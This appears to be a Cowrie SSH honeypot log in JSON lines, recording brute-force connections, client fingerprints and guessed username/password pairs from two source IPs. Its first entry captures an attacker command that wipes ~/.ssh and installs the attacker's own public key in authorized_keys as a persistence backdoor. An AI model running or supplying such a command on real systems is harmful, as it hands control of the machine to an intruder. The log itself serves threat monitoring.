{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:12:04.063333Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:04.065660Z","src_ip":"212.227.235.229","session":"6a24964edb12"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:12:04.324520Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:04.325431Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50692,"dst_ip":"1.2.3.4","dst_port":22,"session":"302172199484","protocol":"ssh","message":"New connection: 212.227.235.229:50692 (1.2.3.4:22) [session: 302172199484]","sensor":"my-vps","timestamp":"2025-08-31T06:12:04.579881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:12:04.581839Z","src_ip":"212.227.235.229","session":"302172199484"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:12:04.837792Z","src_ip":"212.227.235.229","session":"302172199484"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:12:05.867363Z","src_ip":"212.227.235.229","session":"302172199484"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:07.127739Z","src_ip":"212.227.235.229","session":"302172199484"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51680,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c0d08627de3","protocol":"ssh","message":"New connection: 212.227.235.229:51680 (1.2.3.4:22) [session: 2c0d08627de3]","sensor":"my-vps","timestamp":"2025-08-31T06:12:07.384242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:12:07.385336Z","src_ip":"212.227.235.229","session":"2c0d08627de3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:12:07.644078Z","src_ip":"212.227.235.229","session":"2c0d08627de3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:12:08.716266Z","src_ip":"212.227.235.229","session":"2c0d08627de3"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:08.975518Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:08.976555Z","src_ip":"212.227.235.229","session":"2c0d08627de3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:12:10.257962Z","src_ip":"212.227.125.160","session":"34cc318058c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:12:10.259618Z","src_ip":"212.227.125.160","session":"34cc318058c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33162,"dst_ip":"1.2.3.4","dst_port":22,"session":"d62fbcb89427","protocol":"ssh","message":"New connection: 212.227.235.229:33162 (1.2.3.4:22) [session: d62fbcb89427]","sensor":"my-vps","timestamp":"2025-08-31T06:12:15.578728Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43132,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9861f4e59f5","protocol":"ssh","message":"New connection: 212.227.125.160:43132 (1.2.3.4:22) [session: e9861f4e59f5]","sensor":"my-vps","timestamp":"2025-08-31T06:12:15.829983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:12:16.361952Z","src_ip":"212.227.125.160","session":"e9861f4e59f5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:12:16.377603Z","src_ip":"212.227.125.160","session":"e9861f4e59f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16738,"dst_ip":"1.2.3.4","dst_port":22,"session":"1716884851fe","protocol":"ssh","message":"New connection: 212.227.235.229:16738 (1.2.3.4:22) [session: 1716884851fe]","sensor":"my-vps","timestamp":"2025-08-31T06:12:18.638727Z"}
{"eventid":"cowrie.login.failed","username":"test4","password":"123456789","message":"login attempt [test4/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:12:18.822433Z","src_ip":"212.227.125.160","session":"e9861f4e59f5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:12:18.936441Z","src_ip":"212.227.235.229","session":"1716884851fe"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:12:18.937126Z","src_ip":"212.227.235.229","session":"1716884851fe"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:19.850954Z","src_ip":"212.227.235.229","session":"1716884851fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16750,"dst_ip":"1.2.3.4","dst_port":22,"session":"921a2805da73","protocol":"ssh","message":"New connection: 212.227.235.229:16750 (1.2.3.4:22) [session: 921a2805da73]","sensor":"my-vps","timestamp":"2025-08-31T06:12:20.058382Z"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:20.251599Z","src_ip":"212.227.125.160","session":"e9861f4e59f5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:12:20.365480Z","src_ip":"212.227.235.229","session":"921a2805da73"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:12:20.366177Z","src_ip":"212.227.235.229","session":"921a2805da73"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:21.372968Z","src_ip":"212.227.235.229","session":"921a2805da73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16756,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b56c9edf325","protocol":"ssh","message":"New connection: 212.227.235.229:16756 (1.2.3.4:22) [session: 9b56c9edf325]","sensor":"my-vps","timestamp":"2025-08-31T06:12:21.534273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:12:21.880998Z","src_ip":"212.227.235.229","session":"9b56c9edf325"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:12:21.881682Z","src_ip":"212.227.235.229","session":"9b56c9edf325"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:22.756017Z","src_ip":"212.227.235.229","session":"9b56c9edf325"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:12:34.365400Z","src_ip":"212.227.235.229","session":"d62fbcb89427"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:12:34.366310Z","src_ip":"212.227.235.229","session":"d62fbcb89427"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36312,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8f1e4db5976","protocol":"ssh","message":"New connection: 212.227.235.229:36312 (1.2.3.4:22) [session: c8f1e4db5976]","sensor":"my-vps","timestamp":"2025-08-31T06:12:41.305428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:12:41.306197Z","src_ip":"212.227.235.229","session":"c8f1e4db5976"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:12:41.591850Z","src_ip":"212.227.235.229","session":"c8f1e4db5976"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:12:42.776803Z","src_ip":"212.227.235.229","session":"c8f1e4db5976"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:44.065237Z","src_ip":"212.227.235.229","session":"c8f1e4db5976"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59256,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8b8e25558e1","protocol":"ssh","message":"New connection: 212.227.125.160:59256 (1.2.3.4:22) [session: d8b8e25558e1]","sensor":"my-vps","timestamp":"2025-08-31T06:12:45.880717Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59398,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd3d4093593b","protocol":"ssh","message":"New connection: 212.227.235.229:59398 (1.2.3.4:22) [session: bd3d4093593b]","sensor":"my-vps","timestamp":"2025-08-31T06:12:53.209738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:12:54.459327Z","src_ip":"212.227.235.229","session":"bd3d4093593b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:12:54.460272Z","src_ip":"212.227.235.229","session":"bd3d4093593b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40978,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c796d9ee31f","protocol":"ssh","message":"New connection: 212.227.235.229:40978 (1.2.3.4:22) [session: 7c796d9ee31f]","sensor":"my-vps","timestamp":"2025-08-31T06:12:55.529554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:12:55.530828Z","src_ip":"212.227.235.229","session":"7c796d9ee31f"}
